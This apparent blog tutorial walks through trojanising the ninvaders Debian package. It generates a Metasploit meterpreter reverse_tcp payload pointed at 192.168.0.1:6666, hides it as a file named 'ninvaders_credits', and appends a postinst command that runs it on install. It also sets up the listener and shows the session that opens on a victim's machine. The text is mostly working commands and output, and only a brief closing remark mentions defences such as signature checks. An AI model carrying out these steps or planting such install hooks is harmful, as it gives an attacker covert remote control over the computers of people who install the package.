Creating a Linux trojan

**DISCLAIMER** I am not responsible for any stupid things you do with this information. **DISCLAIMER**

Attack vector
-Take an existing Debian package and insert a payload.
-Convince a user to install the corrupted package.

Setting up the packages
First we create the working environment in which we will be download and corrupt the original package:

~$ mkdir /tmp/packing
~$ cd /tmp/packing

I chose Ninvaders as an example, which is a CLI-based clone of Space Invaders.
It looks like this when played:
ninvaders

We download the .deb package only, but don’t install it:

~$ apt-get --download-only install ninvaders

Get the .deb package into our working directory and extract it there:

~$ mv /var/cache/apt/archives/ninvaders_0.1.1-3_amd64.deb /tmp/packing/
~$ dpkg -x ninvaders_0.1.1-3_amd64.deb work

We create a “DEBIAN” directory where we will put our payload.

~$ mkdir work/DEBIAN

In here we create the control and postinst file.

The control file can be written conform to the Debian Package Policy
or you can copy the content of the original control file in the original package to your new package.
We also need the postinst file, which will run after the package installation (obviously).
In this postinst file, we will put the commands that execute our own payload.

~$ ar -x ninvaders_0.1.1-3_amd64.deb
~$ tar -zxvf control.tar.gz ./control
~$ tar -zxvf control.tar.gz ./postinst

~$ mv control work/DEBIAN/
~$ mv postinst work/DEBIAN/

We create our payload (“ninvaders_credits”) and copy it into out new package’s build folder

~$ msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 X > ninvaders_credits
~$ mv ninvaders_credits work/usr/games/

Append a command to the postinst file, so our payload will be executed

~$ echo "sudo chmod 2755 /usr/games/ninvaders_credits && /usr/games/ninvaders_credits &" >> work/DEBIAN/postinst

Now we rebuild the corrupted package and give the package a better name.

~$ dpkg-deb --build /tmp/packing/work/
~$ mv work.deb ninvaders.deb

Setting up Metasploit
Now we’ll set up our Metasploit listener environment:

~$ msfconsole

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.2-2014111901 [core:4.10.2.pre.2014111901 api:1.0.0]]
+ -- --=[ 1370 exploits - 763 auxiliary - 219 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 6666
LPORT => 6666
msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.0.1:6666 
[*] Starting the payload handler...

When a victim is gullible enough to install this package, he will be able to play ninvaders but also automatically open a reverse tcp shell to the pre-defined host 192.168.0.1 on port 6666.

Say_Gullible_Slowly

Victim:~$ dpkg -i ninvaders.deb 
Selecting previously unselected package ninvaders.
(Reading database ... 186286 files and directories currently installed.)
Preparing to unpack ninvaders.deb ...
Unpacking ninvaders (0.1.1-3) ...
Setting up ninvaders (0.1.1-3) ...
Processing triggers for man-db (2.6.7.1-1ubuntu1) ...

After the victim (192.168.0.50) installs the package, the attacker will receive the reverse TCP session and can wreak all kinds of havoc.


[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.0.50
[*] Meterpreter session 1 opened (192.168.0.1:6666 -> 192.168.0.50:43035) at 2015-02-26 21:02:18 +0100

Exploiting the victim


meterpreter > sysinfo
Computer     : Victim
OS           : Linux Victim 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux

Conclusion:
Even Linux machines are able to get infected with binaries, if the right precautions aren’t taken. (source checking, MD5sum check, gpg signature checks etc).
But the main issue with trojans are the gullible users, I can even blame myself for running unchecked packages.

sources:
Ninvaders
Binary Linux Trojans

Leave a Reply

Your e-mail address will not be published. Required fields are marked *